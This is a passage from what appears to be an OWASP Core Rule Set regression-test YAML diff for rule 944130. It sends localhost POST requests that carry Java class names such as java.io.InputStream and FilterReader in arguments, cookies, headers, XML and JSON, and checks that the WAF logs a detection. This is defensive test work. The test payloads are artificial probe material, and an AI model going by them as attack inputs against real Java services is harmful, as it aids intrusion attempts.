Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FilterInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-122 + desc: "Argument test includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-123 + desc: "Argument name includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-124 + desc: "Cookie test includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-125 + desc: "Cookie name includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterOutputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-126 + desc: "Request header test includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterOutputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-127 + desc: "XML attribute value includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-128 + desc: "XML element value includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-129 + desc: "Nested XML element value includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-130 + desc: "Content-Type text/plain includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterOutputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-131 + desc: "Content-Type application/json arg value includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-132 + desc: "Content-Type application/json arg name includes keyword java.io.FilterOutputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FilterOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-133 + desc: "Argument test includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-134 + desc: "Argument name includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-135 + desc: "Cookie test includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-136 + desc: "Cookie name includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-137 + desc: "Request header test includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-138 + desc: "XML attribute value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-139 + desc: "XML element value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-140 + desc: "Nested XML element value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-141 + desc: "Content-Type text/plain includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-142 + desc: "Content-Type application/json arg value includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-143 + desc: "Content-Type application/json arg name includes keyword java.io.FilterReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.FilterReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-144 + desc: "Argument test includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-145 + desc: "Argument name includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStream=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-146 + desc: "Cookie test includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-147 + desc: "Cookie name includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStream=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-148 + desc: "Request header test includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStream + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-149 + desc: "XML attribute value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-150 + desc: "XML element value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-151 + desc: "Nested XML element value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-152 + desc: "Content-Type text/plain includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_title: 944130-153 + desc: "Content-Type application/json arg value includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStream\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-154 + desc: "Content-Type application/json arg name includes keyword java.io.InputStream" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.InputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-155 + desc: "Argument test includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-156 + desc: "Argument name includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStreamReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-157 + desc: "Cookie test includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStreamReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-158 + desc: "Cookie name includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStreamReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-159 + desc: "Request header test includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStreamReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-160 + desc: "XML attribute value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-161 + desc: "XML element value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-162 + desc: "Nested XML element value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-163 + desc: "Content-Type text/plain includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-164 + desc: "Content-Type application/json arg value includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStreamReader\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-165 + desc: "Content-Type application/json arg name includes keyword java.io.InputStreamReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + version: "HTTP/1.0" + data: "{\"java.io.InputStreamReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_title: 944130-166 + desc: "Argument test includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-167 + desc: "Argument name includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + version: "HTTP/1.0" + data: "java.io.LineNumberReader=test" + output: + log_contains: "id \"944130\"" + - test_title: 944130-168 + desc: "Cookie test includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.LineNumberReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-169 + desc: "Cookie name includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.LineNumberReader=test + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-170 + desc: "Request header test includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.LineNumberReader + method: "POST" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-171 + desc: "XML attribute value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_title: 944130-172 + desc: "XML element value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-173 + desc: "Nested XML element value includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + version: "HTTP/1.0" + data: "java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-174 + desc: "Content-Type text/plain includes keyword java.io.LineNumberReader" + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + version: "HTTP/1.0" + data: "test=java.io.LineNumberReader" + output: + log_contains: "id \"944130\"" + - test_title: 944130-175 + desc: 